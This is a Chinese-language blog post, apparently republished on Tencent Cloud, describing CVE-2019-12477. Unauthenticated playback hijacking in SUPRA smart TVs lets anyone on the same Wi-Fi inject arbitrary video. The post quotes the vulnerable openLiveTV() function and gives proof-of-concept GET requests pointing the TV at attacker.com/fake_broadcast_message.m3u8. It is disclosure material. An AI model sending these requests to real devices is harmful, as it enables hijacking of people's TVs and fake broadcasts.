前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >SUPRA智能TV脆弱性

SUPRA智能TV脆弱性

作者头像
全栈工程师修炼指南
发布2022-09-28 21:10:06
2200
发布2022-09-28 21:10:06
举报
文章被收录于专栏:全栈工程师修炼之路

[TOC]

SUPRA智能云播放劫持

描述:SUPRA智能云电视存在播放可劫持漏洞(CVE-2019-12477),与SUPRA电视处于同一无线网络环境中的攻击者,可向电视设备伪造播放请求,插播任意视频内容或虚假广播消息。

Dhiraj Mishra发现的漏洞问题在于电视流媒体获取功能 ‘openLiveURL()’,SUPRA电视用它来获取流媒体的播放内容,该功能缺乏必要的认证授权和会话管理措施,攻击者可以通过向一个静态的URL发送构造请求来触发漏洞,绕过授权验证,向播放机制中注入远程视频流文件,播放任意视频内容。

漏洞详情 漏洞接口位于 /remote/media_control?action=setUri&uri=URI服务端,存在漏洞的功能函数为openLiveTV(url),以下为openLiveTV(url)函数源码片段:

代码语言:javascript
复制
function openLiveTV(url)  {  
    $.get("/remote/media_control", {
        m_action:'setUri',
        m_uri:url,m_type:'video/*'
        },  function (data, textStatus){
        if("success"==textStatus){   
             alert(textStatus);   
             }else   {    
            alert(textStatus);   }  
            });  
        }

向电视设备插入任意视频播放的构造请求POC:

代码语言:javascript
复制
GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 
HTTP/1.1Host: 192.168.1.155
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

直接用以下方式向处于同一无线网络环境中的SUPRA智能电视发起请求,也能实现插播效果POC:

代码语言:javascript
复制
http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

备注:

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-07-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • SUPRA智能云播放劫持
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档